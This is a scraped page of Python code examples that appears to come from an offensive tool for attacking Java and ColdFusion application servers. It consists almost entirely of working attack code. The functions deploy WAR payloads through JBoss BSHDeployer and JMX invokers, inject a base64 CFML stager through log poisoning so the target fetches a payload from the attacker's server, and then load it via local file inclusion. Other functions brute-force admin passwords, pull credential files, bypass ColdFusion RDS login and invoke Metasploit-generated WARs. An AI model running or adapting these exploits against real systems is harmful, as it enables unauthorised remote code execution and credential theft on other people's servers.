Beispiel #1
0
def deploy(fingerengine, fingerprint):
    """ This module exploits the BSHDeployer in an exposed JBoss web-console.
    It essentially invokes /web-console/Invoker to download and deploy a BSH,
    which can be used as a stager for our WAR payload.
    """

    war_file = path.abspath(fingerengine.options.deploy)
    utility.Msg("Preparing to deploy {0}...".format(war_file))

    url = "http://{0}:{1}/web-console/Invoker".format(fingerengine.options.ip,
                                                      fingerprint.port)

    if not rewriteBsh(war_file, fingerengine.options.remote_os):
        utility.Msg("Failed to write WAR to BSH", LOG.ERROR)
        return

    # poll the URL to check for 401
    response = utility.requests_get(url)
    if response.status_code == 401:
        utility.Msg(
            "Host %s:%s requires auth for web-console, checking.." %
            (fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
        cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
                            fingerprint.title, fingerprint.version)

        if cookies:
            (usr, pswd) = (cookies[1].username, cookies[1].password)
            response = bsh_deploy(fingerengine.options.remote_os, url,
                                  fingerprint.version.split('.')[0], usr, pswd)
        else:
            utility.Msg(
                "Could not get auth for %s:%s" %
                (fingerengine.options.ip, fingerprint.port), LOG.ERROR)

    else:
        # run our java lib for the serialized request
        response = bsh_deploy(fingerengine.options.remote_os, url,
                              fingerprint.version.split('.')[0])

    # remove the copied bsh
    system("rm ./src/lib/jboss/bsh_deploy/bshdeploy.bsh")

    if response:
        if type(response) is str and response != '':
            utility.Msg(response, LOG.DEBUG)
        elif response.returncode > 0:
            utility.Msg(
                "Failed to deploy to %s:%s" %
                (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
            utility.Msg(response.output, LOG.DEBUG)
            return

    utility.Msg(
        "{0} deployed to {1}".format(war_file, fingerengine.options.ip),
        LOG.SUCCESS)
Beispiel #2
0
def deploy(fingerengine, fingerprint):
    """ Exploits log poisoning to inject CFML stager code that pulls
    down our payload and stashes it in web root
    """

    cfm_path = abspath(fingerengine.options.deploy)
    cfm_file = parse_war_path(cfm_path, True)
    dip = fingerengine.options.ip

    base = 'http://{0}:{1}/'.format(dip, fingerprint.port)
    stager = "<cfhttp method='get' url='#ToString(ToBinary('{0}'))#'"\
              " path='#ExpandPath(ToString(ToBinary('Li4vLi4v')))#'"\
              " file='{1}'>"

    # ensure we're deploying a valid filetype
    extension = cfm_file.rsplit('.', 1)[1]
    if extension.lower() not in ['jsp', 'cfml']:
        utility.Msg("This deployer requires a JSP/CFML payload", LOG.ERROR)
        return

    # start up our local server to catch the request
    server_thread = Thread(target=_serve, args=(cfm_path, ))
    server_thread.start()

    # inject stager
    utility.Msg("Injecting stager...")
    b64addr = b64encode('http://{0}:{1}/{2}'.format(utility.local_address(),
                                                    state.external_port,
                                                    cfm_file))
    stager = quote_plus(stager.format(b64addr, cfm_file))

    stager += ".cfml"  # trigger the error for log injection
    _ = utility.requests_get(base + stager)

    # stager injected, now load the log file via LFI
    if fingerprint.version in ["9.0", "10.0"]:
        LinvokeLFI(base, fingerengine, fingerprint)
    else:
        invokeLFI(base, fingerengine, fingerprint)

    if waitServe(server_thread):
        utility.Msg("{0} deployed at /{0}".format(cfm_file), LOG.SUCCESS)
    else:
        utility.Msg("Failed to deploy file.", LOG.ERROR)
        killServe()
Beispiel #3
0
    def run(self, fingerengine, fingerprint):
        """ Obtains remote Coldfusion information from the reports index page.
        This pulls the first 26 entries from this report, as there's lots of
        extraneous stuff.  Perhaps if requested I'll prompt to extend to the
        remainder of the settings.
        """

        utility.Msg("Attempting to retrieve Coldfusion info...")

        base = "http://{0}:{1}".format(fingerengine.options.ip,
                                       fingerprint.port)
        uri = "/CFIDE/administrator/reports/index.cfm"

        try:
            response = utility.requests_get(base + uri)
        except Exception, e:
            utility.Msg("Failed to fetch info: %s" % e, LOG.ERROR)
            return
Beispiel #4
0
def _auth(usr, pswd, url):
    """
    """
    res = utility.requests_get(url, auth=HTTPBasicAuth(usr, pswd))

    if res.status_code == 200:
        utility.Msg("Successfully authenticated with %s:%s" % (usr, pswd),
                    LOG.DEBUG)
        return (dict_from_cookiejar(res.cookies), HTTPBasicAuth(usr, pswd))
Beispiel #5
0
    def run(self, fingerengine, fingerprint):
        """ Simple fetch
        """

        utility.Msg("Fetching credentials...")
        base = 'http://{0}:{1}'.format(fingerengine.options.ip,
                                       fingerprint.port)
        uri = '/conf/users/admin-users.xml'

        response = utility.requests_get(base + uri)
        if response.status_code is 200:

            un = findall("name=\"(.*?)\"", response.content)
            pw = findall("password=\"(.*?)\"", response.content)
            if len(pw) > 0 and len(un) > 0:
                utility.Msg("Found credentials:")
                for (u, p) in zip(un, pw):
                    utility.Msg("\t%s:%s" % (u, p), LOG.SUCCESS)
Beispiel #6
0
def _auth(usr, pswd, url):
    """ Authentication is trivially obtained via the admin REST interface
    """

    res = utility.requests_get(url, auth=HTTPBasicAuth(usr, pswd))
    if res.status_code == 200:
        utility.Msg("Successfully authenticated with %s:%s" % (usr, pswd),
                    LOG.DEBUG)
        return HTTPBasicAuth(usr, pswd)
Beispiel #7
0
def deploy(fingerengine, fingerprint):
    """ This deployer is slightly different than manager_deploy in
    that it only requires the manager-gui role.  This requires us
    to deploy like one would via the web interface. 
    """

    base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
    uri = '/manager/html/upload'
    war_file = fingerengine.options.deploy
    war_path = parse_war_path(war_file)
    cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
                        fingerprint.title, fingerprint.version)
    if not cookies:
        utility.Msg(
            "Could not get auth for %s:%s" %
            (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
        return

    utility.Msg("Preparing to deploy {0}...".format(war_file))

    if fingerprint.version in ['6.0', '7.0', '8.0']:
        # deploying via the gui requires a CSRF token
        (csrf, c) = fetchCSRF(base, cookies)
        if not csrf:
            return
        else:
            # set CSRF and refresh session id
            uri += '?org.apache.catalina.filters.CSRF_NONCE={0}'
            uri = uri.format(csrf)
            cookies = (c, cookies[1])

    # read in payload
    try:
        tag = 'deployWar'
        if fingerprint.version in ['4.0', '4.1']:
            tag = 'installWar'
        files = {tag: (war_path + '.war', open(war_file, 'rb'))}
    except Exception as e:
        utility.Msg(e, LOG.ERROR)
        return

    # deploy
    response = utility.requests_post(base + uri,
                                     files=files,
                                     cookies=cookies[0],
                                     auth=cookies[1])

    if response.status_code == 200 and "OK" in response.content:
        utility.Msg("Deployed {0} to /{1}".format(war_file, war_path),
                    LOG.SUCCESS)
    elif 'Application already exists' in response.content:
        utility.Msg("Application {0} is already deployed".format(war_file),
                    LOG.ERROR)
    elif response.status_code is 403:
        utility.Msg("This account does not have permissions to remotely deploy.  Try"\
                    " using manager_deploy", LOG.ERROR)
    else:
        utility.Msg("Failed to deploy (HTTP %d)" % response.status_code,
                    LOG.ERROR)
Beispiel #8
0
def checkAuth(ip, port, title):
    """ Railo doesn't have usernames, so we only care about passwords
    """

    url = None            
    if title is RINTERFACES.WEB:
        url = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, port)
    elif title is RINTERFACES.SRV:
        url = "http://{0}:{1}/railo-context/admin/server.cfm".format(ip, port)

    if state.usr_auth:
        # check with given auth; handle both cases of "default" and ":default"
        if ':' in state.usr_auth:
            (_, pswd) = state.usr_auth.split(":")
        else:
            pswd = state.usr_auth
        return _auth(pswd, url, title)

    if state.bf_wordlist and not state.hasbf:

        state.hasbf = True
        wordlist = []
        with open(state.bf_wordlist, "r") as f:
            wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]

        utility.Msg("Brute forcing %s with %d passwords..." % (state.bf_user,
                                len(wordlist)), LOG.DEBUG)

        try:
            for (idx, word) in enumerate(wordlist):
                stdout.flush()
                stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
                                % (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))

                cook = _auth(word, url, title)
                if cook:
                    print ''
                    utility.Msg("Successful login with %s" % word, LOG.SUCCESS)
                    return cook

            print ''

        except KeyboardInterrupt:
            pass
Beispiel #9
0
    def _run5(self, fingerengine, fingerprint):
        """ Pull sys info from older CF instances; it is quite ugly
        """

        utility.Msg("Attempting to retrieve Coldfusion info...")

        cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
                            fingerprint.title, fingerprint.version)[0]
        if not cookies:
            utility.Msg("Could not get auth for %s:%s" %
                         (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
            return

        base = 'http://{0}:{1}'.format(fingerengine.options.ip,
                                       fingerprint.port)

        if fingerprint.version in ['5.0']:
            uri = '/CFIDE/administrator/server_settings/version.cfm'
        elif fingerprint.version in ['6.0', '6.1']:
            uri = '/CFIDE/administrator/settings/version.cfm'

        response = utility.requests_get(base+uri, cookies=cookies)

        if fingerprint.version in ['5.0']:

            keys = findall("<td height=\".*?\" nowrap>(.*?)</td>", response.content.translate(None, '\r\n'))[1:]
            values = findall("<td>(.*?)</td>", response.content.translate(None, '\r\n'))
            for (key, value) in zip(keys, values[2:]):
                k = findall("class=\"text2\">(.*?)</p>", key)[0].replace("&nbsp;",'').rstrip()
                v = findall(">(.*?)\t", value)[0].replace(' ','')
                utility.Msg("  %s: %s" % (k, v))

        elif fingerprint.version in ['6.0', '6.1']:

            keys = findall("<td height=\"18\" nowrap>(.*?)</td>", 
                            response.content.translate(None, '\r\n'))
            values = findall("<td width=\"100%\" class=\"color-row\">(.*?)</td>",
                            response.content.translate(None, '\r\n'))

            for (key, value) in zip(keys[:-2], values[:-2]):

                k = findall("&nbsp;(.*?)&nbsp;", key)[0].lstrip().rstrip()
                v = findall("&nbsp;(.*?)\t", value)[0].lstrip().rstrip()
                utility.Msg("  %s: %s" % (k, v))
Beispiel #10
0
def undeploy(fingerengine, fingerprint):
    """ Undeploying is quite simple via the exposed REST API
    """

    if fingerprint.version in ['3.1', '4.0']:
        state.ssl = True

    base = 'http://{0}:{1}'.format(fingerengine.options.ip,
                                    fingerprint.port)
    context = parse_war_path(fingerengine.options.undeploy)
    cookie = checkAuth(fingerengine.options.ip, fingerprint.port,
                       fingerprint.title)
    headers = {
            "Accept" : "application/json",
            "X-Requested-By" : "requests"
    }

    if not cookie:
        utility.Msg("Could not get auth for %s:%s" %
                       (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
        return

    utility.Msg("Preparing to undeploy %s..." % context)
    uri = '/management/domain/applications/application/%s' % context

    if fingerprint.version in ['3.0']:

        # GF 3.0 doesnt appear to support the DELETE verb
        data = {
                "operation" : "__deleteoperation"
        }

        response = utility.requests_post(base + uri, auth=cookie,
                                         headers=headers,
                                         data=data)
    else:
        response = utility.requests_delete(base + uri, auth=cookie, 
                                         headers=headers)

    if response.status_code is 200:
        utility.Msg("'%s' undeployed successfully" % context, LOG.SUCCESS)
    else:
        utility.Msg("Failed to undeploy %s: %s" % (context, response.content),
                                                  LOG.ERROR)
Beispiel #11
0
def auxengine(fingerengine):
    """ Our core auxiliary engine runs as such:

            1. While building the command parser, we load all modules and append their
               CLI flags to a hidden argument parser.

            2. After fingerprinting the remote service, we load all of the platform's
               modules and run check(); this will return True/False as to whether or
               not it applies to the fingerprint.

            3. If the fingerprint applies, we check for --fingerprint, which will
               simply list that it is acceptable.  We also check for the auxiliarys
               hidden flag and, if it exists, we run the auxiliary.
    """

    fpath = [abspath("./src/platform/%s/auxiliary" % fingerengine.service)]
    modules = list(pkgutil.iter_modules(fpath))
    found = []

    for fingerprint in fingerengine.fingerprints:
        for auxiliary in modules:

            mod = auxiliary[0].find_module(auxiliary[1]).load_module(
                auxiliary[1])

            try:
                mod = mod.Auxiliary()
            except:
                # logged in build_platform_flags
                continue

            if mod.name not in found and mod.check(fingerprint):
                if fingerengine.options.fp:
                    utility.Msg(
                        "Vulnerable to %s (--%s)" % (mod.name, mod.flag),
                        LOG.SUCCESS)
                elif vars(fingerengine.options)[mod.flag]:
                    try:
                        mod.run(fingerengine, fingerprint)
                    except Exception, e:
                        utility.Msg("Error with module: %s" % e, LOG.ERROR)

                found.append(mod.name)
    def check(self, ip, port = None):
        """
        """

        try:
            rport = self.port if port is None else port
            url = "http://{0}:{1}/resource/xx.cs".format(ip, rport)
            main_url = "http://{0}:{1}{2}".format(ip, rport, self.uri)

            response = utility.requests_get(url)
            if response.status_code == 404:

                data = findall("Edition|Server (.*?) *</h3>", response.content)
                if len(data) > 0 and self.version in data[0]:

                    #
                    # The admin interface can be remotely exposed, but not accessible; lets
                    # check for that 
                    #
                    main_r = utility.requests_post(main_url, 
                                    data={"j_username":"******",
                                          "j_password":"",
                                          "loginButton.DisabledHiddenField":"true"
                                          }
                                    )

                    if 'Secure Admin must be enabled' in main_r.content:
                        utility.Msg("Admin interface version %s discovered, but"
                                    " not remotely accessible." % self.version,
                                    LOG.UPDATE)
                        return False
                
                    return True

        except exceptions.Timeout:
            utility.Msg("{0} timeout to {1}:{2}".format(self.platform,
                                                        ip, rport),
                                                        LOG.DEBUG)
        except exceptions.ConnectionError:
            utility.Msg("{0} connection error to {1}:{2}".format(self.platform,
                                                          ip, rport),
                                                          LOG.DEBUG)
        return False
Beispiel #13
0
    def run(self, fingerengine, fingerprint):
        """ Obtain a list of deployed WARs on a remote Tomcat instance
        """

        utility.Msg("Obtaining deployed applications...")
        base = "http://{0}:{1}".format(fingerengine.options.ip,
                                       fingerprint.port)
        relative = '/manager/list'

        if fingerprint.version in ["7.0", "8.0"]:
            relative = '/manager/text/list'

        url = base + relative

        response = utility.requests_get(url)
        if response.status_code == 401:
            utility.Msg(
                'Host %s:%s requires auth, checking...' %
                (fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
            cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
                                fingerprint.title, fingerprint.version)

            if cookies:
                response = utility.requests_get(url,
                                                cookies=cookies[0],
                                                auth=cookies[1])
            else:
                utility.Msg(
                    "Could not get auth for %s:%s" %
                    (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
                return

        if response.status_code == 200:

            apps = response.content.split('\n')[1:-1]
            for app in apps:
                utility.Msg("App found: %s" % app.split(':', 1)[0])

        else:
            utility.Msg(
                "Unable to retrieve %s (HTTP %d)" %
                (url, response.status_code), LOG.DEBUG)
Beispiel #14
0
def undeploy(fingerengine, fingerprint):
    """ Undeploy a deployed application from the remote WL server
    """

    app = fingerengine.options.undeploy
    # ensure it ends with war
    app = app if '.war' in app else app + '.war'

    base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port)
    if fingerprint.title is WINTERFACES.WLS:
        base = base.replace("http", "https")

    uri = "/console/console.portal?AppApplicationUninstallPortletreturnTo="\
          "AppAppApp&AppDeploymentsControlPortlethandler="\
          "com.bea.console.handles.JMXHandle(\"com.bea:Name=mydomain,Type=Domain\")"
    data = { "all" : "on",
            "AppApplicationUninstallPortletchosenContents" : 
                    "com.bea.console.handles.AppDeploymentHandle%28%22com.bea"\
                    "%3AName%3D{0}%2CType%3DAppDeployment%22%29".format(app),
            "_pageLabel" : "AppApplicationUninstallPage",
            "_nfpb" : "true",
            "AppApplicationUninstallPortletfrsc" : None
           }

    utility.Msg("Host %s:%s requires auth, checking.." % 
                    (fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
    cookies = checkAuth(fingerengine.options.ip, fingerprint, True)
    
    if cookies[0]:

        data['AppApplicationUninstallPortletfrsc'] = fetchCSRF(base, cookies[0])

        try:
            utility.requests_post(base + uri, data=data, cookies=cookies[0], timeout=1.0)
        except exceptions.Timeout:
            utility.Msg("{0} undeployed.".format(app), LOG.SUCCESS)
        else:
            utility.Msg("Failed to undeploy {0}".format(app), LOG.ERROR)

    else:
        utility.Msg("Could not get auth for %s:%s" % 
                        (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
Beispiel #15
0
def make_request(method,
                 host,
                 port,
                 ssl,
                 url,
                 data,
                 cookies=None,
                 allow_redirects=True):
    response = None
    if port == None and ssl:
        port = 443
    if port == None and not ssl:
        port = 80
    try:
        url = "{0}://{1}:{2}{3}".format("https" if ssl else "http", host, port,
                                        url)
        if method == 'GET':
            response = utility.requests_get(url, cookies=cookies)
        elif method == 'BASIC':
            response = utility.requests_get(url,
                                            cookies=cookies,
                                            auth=(data['username'],
                                                  data['password']))
        elif method == 'POST':
            response = utility.requests_post(url,
                                             data,
                                             cookies=cookies,
                                             allow_redirects=allow_redirects)
        elif method == 'HEAD':
            response = utility.requests_head(url, cookies=cookies)
        elif method == 'PUT':
            response = utility.requests_put(url, data, cookies=cookies)
        else:
            response = utility.requests_other(method, url, cookies=cookies)

        return response

    except exceptions.Timeout:
        utility.Msg("Timeout to {0}:{1}".format(host, port), 'DEBUG')
    except exceptions.ConnectionError, e:
        utility.Msg("Connection error to {0} ({1})".format(host, port, e),
                    'DEBUG')
Beispiel #16
0
def invoke_axis2(fingerengine, fingerprint, deployer):
    """ Invoke an Axis2 payload
    """

    dfile = parse_war_path(fingerengine.options.deploy)
    url = 'http://{0}:{1}/axis2/services/{2}'.format(fingerengine.options.ip,
                                                     fingerprint.port, dfile)

    if fingerprint.version not in ['1.6']:
        # versions < 1.6 require an explicit invocation of run
        url += '/run'

    utility.Msg("Attempting to invoke...")

    if _invoke(url):
        utility.Msg("{0} invoked at {1}".format(dfile,
                                                fingerengine.options.ip))
        return

    utility.Msg("Failed to invoke {0}".format(dfile), LOG.ERROR)
def parseGnmap(inFile, httpOnly, useNmapSSL):
    if (detectFileType(inFile) == 'gnmap'):
        targets = []
        for hostLine in inFile:
            #Pull out the IP address (or hostnames) and HTTP service ports
            fields = hostLine.split(' ')
            ip = fields[
                1]  #not going to regex match this with ip address b/c could be a hostname
            for item in fields:
                if (httpOnly):
                    #Make sure we have an open port with an http type service on it
                    if item.find('http') != -1 and re.findall(
                            '\d+/open', item):
                        port = None
                        https = False
                        '''
                        nmap has a bunch of ways to list HTTP like services, for example:
                        8089/open/tcp//ssl|http
                        8000/closed/tcp//http-alt///
                        8008/closed/tcp//http///
                        8080/closed/tcp//http-proxy//
                        443/open/tcp//ssl|https?///
                        8089/open/tcp//ssl|http
                        Since we want to detect them all, let's just match on the word http
                        and make special cases for things containing https and ssl when we
                        construct the URLs.
                        '''
                        port = item.split('/')[0]

                        if item.find('https') != -1 or item.find('ssl') != -1:
                            https = True
                        #Add the current service item to the currentTarget list for this host
                        if (useNmapSSL):
                            targets.append(ip + ":" + port + ":" + str(https))
                        else:
                            targets.append(ip + ":" + port)
                else:
                    if item.find('tcp') != -1 and re.findall('\d+/open', item):
                        port = None
                        ssl = False
                        port = item.split('/')[0]

                        if item.find('https') != -1 or item.find('ssl') != -1:
                            ssl = True
                        #Add the current service item to the currentTarget list for this host
                        if (useNmapSSL):
                            targets.append(ip + ":" + port + ":" + str(ssl))
                        else:
                            targets.append(ip + ":" + port)

        return targets
    else:
        utility.Msg('Nmap file is not of type gnmap', 'ERROR')
        return []
Beispiel #18
0
def invkdeploy(version, url, local_url):
    """
    """

    res = None
    try:
        res = check_output(["./invkdeploy.sh", version, url, local_url],
                           cwd="./src/lib/jboss/jmxinvoke_deploy")
    except Exception, e:
        utility.Msg(e, LOG.DEBUG)
        res = e
Beispiel #19
0
def create_task(ip, fingerprint, cfm_file, root):
    """ Create the task
    """

    url = "http://{0}:{1}/CFIDE/administrator/scheduler/scheduleedit.cfm".\
                                                    format(ip, fingerprint.port)

    (cookie, csrf) = fetch_csrf(ip, fingerprint, url)
    data = {
        "TaskName":
        cfm_file,
        "Start_Date":
        "Jan 27, 2014",  # shouldnt matter since we force run
        "ScheduleType":
        "Once",
        "StartTimeOnce":
        "9:56 PM",  # see above
        "Operation":
        "HTTPRequest",
        "ScheduledURL":
        "http://{0}:{1}/{2}".format(state.external_port,
                                    utility.local_address(), cfm_file),
        "publish":
        "1",
        "publish_file":
        root + "\\" + cfm_file,  # slash on OS?
        "adminsubmit":
        "Submit"
    }

    # version-specific settings
    if fingerprint.version in ["9.0", "10.0", '11.0']:
        data['csrftoken'] = csrf

    if fingerprint.version in ["10.0", '11.0']:
        data['publish_overwrite'] = 'on'

    if fingerprint.version in ["7.0", "8.0"]:
        data['taskNameOrig'] = ""

    response = utility.requests_get(url, cookies=cookie)
    if response.status_code is 200:

        # create task
        response = utility.requests_post(
            url,
            data=data,
            cookies=cookie,
            headers={'Content-Type': 'application/x-www-form-urlencoded'})
        if response.status_code is 200:
            return True
        else:
            utility.Msg("Failed to deploy (HTTP %d)" % response.status_code,
                        LOG.ERROR)
Beispiel #20
0
def undeploy(fingerengine, fingerprint):
    """
    """

    if fingerprint.title is JINTERFACES.JMX:
        return jmx_undeploy(fingerengine, fingerprint)
    elif fingerprint.title is JINTERFACES.MM:
        return manage_undeploy(fingerengine, fingerprint)
    else:
        utility.Msg("JBoss interfaces %s does not yet support undeploying" %\
                                                fingerprint.title, LOG.ERROR)
Beispiel #21
0
def _auth(usr, pswd, url, version):
    """ Currently only auths to the admin interface
    """

    data = {"userName": usr, "password": pswd, "submit": "+Login+"}

    response = utility.requests_post(url, data=data)
    if response.status_code is 200 and not "name=\"password\"" in response.content:
        utility.Msg("Successfully authenticated with %s:%s" % (usr, pswd),
                    LOG.DEBUG)
        return dict_from_cookiejar(response.cookies)
Beispiel #22
0
def invoke_war(fingerengine, fingerprint):
    """  Invoke a deployed WAR or JSP file on the remote server.

    This uses unzip because Python's zip module isn't very portable or
    fault tolerant; i.e. it fails to parse msfpayload-generated WARs, though
    this is a fault of metasploit, not the Python module.
    """

    dfile = fingerengine.options.deploy
    jsp = ''

    if '.war' in dfile:
        jsp = getoutput("unzip -l %s | grep jsp" % dfile).split(' ')[-1]
    elif '.jsp' in dfile:
        jsp = parse_war_path(dfile, True)

    if jsp == '':
        utility.Msg("Failed to find a JSP in the deployed WAR", LOG.DEBUG)
        return

    utility.Msg("Using JSP {0} from {1} to invoke".format(jsp, dfile),
                LOG.DEBUG)

    war_path = parse_war_path(dfile)
    try:
        # for jboss ejb/jmx invokers, we append a random integer
        # in case multiple deploys of the same name are used
        if fingerengine.random_int:
            war_path += fingerengine.random_int
    except:
        pass

    url = "http://{0}:{1}/{2}/{3}".format(fingerengine.options.ip,
                                          fingerprint.port, war_path, jsp)

    if _invoke(url):
        utility.Msg("{0} invoked at {1}".format(war_path,
                                                fingerengine.options.ip))
    else:
        utility.Msg("Failed to invoke {0}".format(parse_war_path(dfile, True)),
                    LOG.ERROR)
Beispiel #23
0
    def run(self, fingerengine, fingerprint):

        utility.Msg("Checking RDS...")
        base = "http://{0}:{1}".format(fingerengine.options.ip,
                                       fingerengine.options.port)

        url = base + "/CFIDE/adminapi/administrator.cfc?method=login"

        payload = {'adminpassword': '', 'rdsPasswordAllowed': 1}

        rval = utility.requests_post(url, payload)
        if rval.status_code is 200:
            rval = rval.content
            if "true" in rval:
                rval = utility.requests_get(base +
                                            "/CFIDE/administrator/index.cfm")

                if rval.status_code is 200:
                    utility.Msg("Login bypass successful.", LOG.SUCCESS)
                else:
                    utility.Msg("System not vulnerable.", LOG.ERROR)
Beispiel #24
0
def bsh_deploy(arch, url, version, usr = None, pswd = None):
    """ Invoke the BSHDeployer
    """

    res = None
    try:
        res = check_output(["./bshdeploy.sh", url, arch, version,
                                              str(usr), str(pswd)],
                            cwd="./src/lib/jboss/bsh_deploy")
    except Exception, e:
        utility.Msg(e, LOG.DEBUG)
        res = e
    def check_service(self, service):
        """ Given a service, this will initiate our fingerprinting engine against
        the remote host and return a list of all matched fingerprints.  Successful
        fingerprints will also be dumped to console.
        """

        utility.Msg("Loading fingerprint engine '%s'" % service, LOG.DEBUG)

        matched_fingerprints = self.definitions(self.options.ip,
                                                self.options.port, service)
        if len(matched_fingerprints) > 0:
            utility.Msg("Matched %d fingerprints for service %s" %
                        (len(matched_fingerprints), service))

            for fp in matched_fingerprints:
                utility.Msg("\t%s (version %s)" % (fp.title, fp.version),
                            LOG.SUCCESS)
        else:
            utility.Msg("No fingerprints found for service %s" % service)

        return matched_fingerprints
Beispiel #26
0
    def _getPath(self, version):
        """ Return the traversal path based on the version.  I haven't figured out
        how to traverse just yet in 3.0/4.0.2, but it should be possible.
        """

        if version in ["3.0", "4.0"]:
            utility.Msg("Version %s is not vulnerable to credential retrieval"
                        ", but is vulnerable to path disclosure" % version, 
                        LOG.UPDATE)
            return ".\\\..\\\client\\\\auth.conf"
        elif version in ["3.2"]:
            return "jmx-console-users.properties"
def worker(checkQueue, tout):
    while True:
        #Try to a check from the queue
        try:
            curCheck = checkQueue.get(timeout=tout)
            utility.Msg(str(checkQueue.qsize()) + ' checks remaining', 'DEBUG')
            check = curCheck[0]
            host_port_ssl = curCheck[1]
            check_status = False
            if (len(host_port_ssl) > 1):
                check_status = check.check(host_port_ssl[0], host_port_ssl[1],
                                           host_port_ssl[2])
                check.print_message(check_status, host_port_ssl[0],
                                    host_port_ssl[1])
            else:
                check_status = check.check(host_port_ssl[0])
                check.print_message(check_status, host_port_ssl[0])

        except Queue.Empty:
            utility.Msg('Check queue is empty, worker quitting.', 'DEBUG')
            return
Beispiel #28
0
def wc_invoke(url, local_url, usr = None, pswd = None):
    """ Invoke the webconsole deployer
    """

    res = None
    try:
        res = check_output(["./webc_deploy.sh", url, local_url, str(usr),
                            str(pswd)],
                            cwd="./src/lib/jboss/webconsole_deploy")
    except Exception, e:
        utility.Msg(e, LOG.DEBUG)
        res = e
Beispiel #29
0
def _invoke(url):
    """ Make the request
    """

    status = False
    try:
        response = utility.requests_get(url)
        if response.status_code == 200:
            status = True
    except Exception, e:
        utility.Msg("Failed to invoke payload: %s" % e, LOG.ERROR)
        status = False
Beispiel #30
0
def run(fingerengine):
    """ Undeploying is much simpler than deploying; we have a single undeploy
    file that supports a list of interfaces.
    """

    try:
        undeployer = import_module("src.platform.%s.undeployer" %
                                   fingerengine.service)
    except:
        utility.Msg(
            "No undeployer found for platform %s" % fingerengine.service,
            LOG.ERROR)
        return

    for fingerprint in fingerengine.fingerprints:

        if fingerprint.title in undeployer.titles:
            undeployer.undeploy(fingerengine, fingerprint)
            return

    utility.Msg("No valid fingerprints were found to undeploy.", LOG.ERROR)